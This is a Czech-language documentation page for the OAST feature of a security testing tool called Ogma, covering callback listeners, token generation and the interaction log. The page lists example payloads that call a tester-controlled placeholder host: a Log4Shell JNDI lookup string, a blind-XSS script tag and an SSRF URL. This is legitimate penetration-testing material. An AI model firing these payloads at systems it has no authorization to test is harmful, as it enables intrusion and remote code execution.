Přejít na obsah

OAST ​

OAST (Out-of-Band Application Security Testing) odhaluje zranitelnosti, které neposkytují viditelnou odpověď – místo toho cíl naváže odchozí spojení s naslouchající službou pod vaší kontrolou, čímž problém potvrdí.

Jak to funguje ​

Ogma spouští místní naslouchající služby pro více protokolů. Když cílová aplikace kontaktuje některou z nich, interakce se zaznamená spolu se zdrojovou IP adresou, časovým razítkem, přijatými daty a vloženým tokenem.

Protokoly naslouchajících služeb ​

ProtokolVýchozí portPoužití
HTTPNastavitelnýSSRF, slepé XSS, webhooky
HTTPSNastavitelnýSSRF přes TLS
DNSNastavitelnýSlepá injekce, XXE, log4shell
SMTPNastavitelnýInjekce do e-mailových hlaviček, SSRF na poštovní služby

V panelu nastavení OAST nastavte porty naslouchajících služeb a doménové jméno používané ve vygenerovaných tokenech.

Vygenerování tokenu zpětného volání ​

  1. Otevřete Pomocné nástroje > OAST.
  2. Klikněte na + Nový a poté na Vytvořit. Každý token je jedinečný pro daný test.
  3. Zkopírujte token. Obsahuje doménu vaší naslouchající služby a jedinečný identifikátor, aby bylo možné interakce přiřadit ke konkrétnímu testu.

Příklad formátu tokenu: [unique-id].[your-oast-domain]

Použití tokenů v payloadech ​

Vložte token zpětného volání do libovolného pole, které může přimět aplikaci navázat odchozí spojení:

  • SSRF – použijte token HTTP/HTTPS jako cílovou URL: https://[token]/
  • XXE – odkažte na token v DOCTYPE nebo v URL externí entity.
  • Log4Shell – vložte jej do hlavičky: ${jndi:ldap://[token]/a}
  • Slepé XSS – vložte jej jako src skriptu: <script src="https://[token]/x.js"></script>
  • Injekce SMTP – použijte jej jako cílovou adresu nebo URL v e-mailových hlavičkách.

Protokol interakcí ​

Panel interakcí zobrazuje každé přijaté zpětné volání:

SloupecPopis
ČasKdy byla interakce přijata
ProtokolHTTP, HTTPS, DNS nebo SMTP
Zdrojová IPIP adresa, ze které bylo navázáno spojení
TokenKterý token byl kontaktován
DataCesta požadavku, název dotazu DNS nebo data SMTP

Klikněte na libovolný řádek a zobrazte úplné podrobnosti interakce včetně hlaviček a těla požadavku, pokud jsou pro daný protokol relevantní.

Přiřazování interakcí k testům ​

Protože je každý token jedinečný, můžete do různých parametrů nebo požadavků vložit různé tokeny a přesně určit, které místo vložení vyvolalo zpětné volání.

Proprietární software. Všechna práva vyhrazena.